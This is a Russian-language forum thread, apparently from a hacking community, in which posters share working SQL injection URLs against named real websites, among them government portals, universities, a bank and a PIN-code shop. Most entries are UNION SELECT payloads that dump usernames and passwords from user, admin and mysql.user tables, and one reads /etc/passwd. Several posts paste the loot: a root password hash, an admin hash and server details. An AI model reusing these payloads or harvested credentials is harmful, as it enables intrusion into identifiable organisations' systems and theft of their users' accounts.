SQL Инъекции

наверное MySql 3 версии.

 

Code:

http://wristband.mobi/index.php?mode=productdetail&id=-465+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,username,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+users/*

 

Немного gov :

Code:

http://www.monitor-nhsft.gov.uk/publications.php?id=930+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

Code:

http://www.equestriancentre.nsw.gov.au/news_detail.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Code:

http://www.chubut.gov.ar/tramites/descripcion_imprimir.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

Code:

http://www.parl.gov.mn/detail.php?pid=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

Code:

http://wildlife.utah.gov/watersheds/project/detailed.php?id=-680+union+select+1,2,user(),4/*

Code:

http://www.regattacentre.nsw.gov.au/print.php?id=-20+union+select+1,2,3,user(),5,version(),database(),8,9,10,11,12,13,14,15,16/*

Code:

http://gulin.nbyz.gov.cn/news_read.php?id=-2+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

Code:

http://www.bogota.gov.co/guia/interfaz/ciudadano/VIEW_tramite_print.php?id=-1+union+select+user()/*

 

Code:

http://www.dvgu.ru/news/shownews.phtml?a=show&id=3437+and+lower(user())=char(0x64,0x76,0x67,0x75,0x40,0x77,0x33,0x2e,0x64,0x76,0x67,0x75,0x2e,0x72,0x75)

user: [email protected]

 

//

 

To 0nep@t0p. По поводу

Тут действительно скуль 3 версии (точнее 32359). И иньекция возможна. Вот как удалось определить версию
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=395+/*!32359+AND+0+*/
Помогла статья http://www.securitylab.ru/contest/212101.php - SQL инъекция в MySQL сервере третей версии.
Но дальше не копал, мороки много если нужно колупай.
З.Ы. Оказываеться не только UNION SELECT

 

Code:

http://www.lancerregister.com/store_category.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

 

_http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,password,user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+where+id=1/*

 

Банк "Экспресс-Кредит"
www.expr.ru

Code:

http://www.expr.ru/news2/?act=show_news&id=-1+union+select+1,2,version(),user(),5,6,7,8/*

 

Dominican University of California

 

магазин PIN-кодов

Code:

http://popolni.in.ua/shop.php?r=-1+union+select+1,2,3,concat(id,0x3a,pass,0x3a,name,0x3a,status),5,6,7+from+admins+limit+1,1/*

 

University of Nairobi // ну да, сегодня универы
Подозрение

Подбираем колонки

Узнаем основную информацию

Пятерка. Смотрим таблицы и колонки

Выводим че-нить..

 

club.azlk.ru

http://club.azlk.ru/index.php3?mode=showcar&carid=-1+union+select+1,passwd,nick,4,5,6,7,8,9,10,name,12,13,14,15,16+from+users+limit+1,1

 

_http://www.dubinushka.ru/m_files.php?ms_id=-54+union+select+1,concat(login,0x3a,pass)+from+users/*

 

На сайтеге http://looperman.com/loops.php

 

EDU:

Code:

http://ctbp.ucsd.edu/workshops/index.php?id=-18%27+union+select+1,version(),username,4,5,6,7,8,9,10,11,12,13,14+from+users/*

Code:

http://journalism.berkeley.edu/events/details.php?ID=397+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*

Code:

http://crca.ucsd.edu/views.php?id=-5+union+select+1,version(),concat_ws(0x3a,user,password)+from+mysql.user+limit+0,1/*

stanford?

Code:

http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(user()+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user/*

root@localhost

Code:

http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(concat(user,0x3a,password)+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+0,1/*

root:*B8EE85A14FC4800165C57E0B7C18B2CBC1EE3EC8

Code:

http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(load_file('/etc/passwd')+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+0,1/*

/etc/passwd

 

Мой первый пост (вроде не боян):
http://www.ourpeople.ru/db.cgi?p=671'

ну тут все тривиально и неинтересно....

http://www.ourpeople.ru/db.cgi?p=-1%20union%20select%20ID,null,null,null,null,null,Name,NickName,null,null,password%20as%20WWWPage,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20Users%20WHERE%20ID IN (1602)
- ибо знак "=" рвет запрос

 

http://www.xewb.com/

Code:

http://www.xewb.com/show_cat.php?cat_id=-1+union+select+1,concat_ws(login,0x3a,password)+from+dir_login/*

Load_File работает, ибо рут, как ни странно, имеет File_Priv.

user: root@localhost
database: xewbcom_dbroot@localhost
version: [email protected]

User&Pass: 4admin:01f8f7cdac8b238f7db655246a8aa894

 

skidmore.edu

Code:

http://www.skidmore.edu/academics/art/artimages/image.php?id=-1%20UNION%20SELECT%201/*

(появляется изображение > смотрим исходный код)

Load_File() работает

user:root@localhost

dukemednews.duke.edu

http://dukemednews.duke.edu/news/article.php?id=-1%20UNION%20SELECT%201,2,3,44444,DATABASE(),6,USER(),55/*

 

http://www.pubstoronto.com

Code:

http://www.pubstoronto.com/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*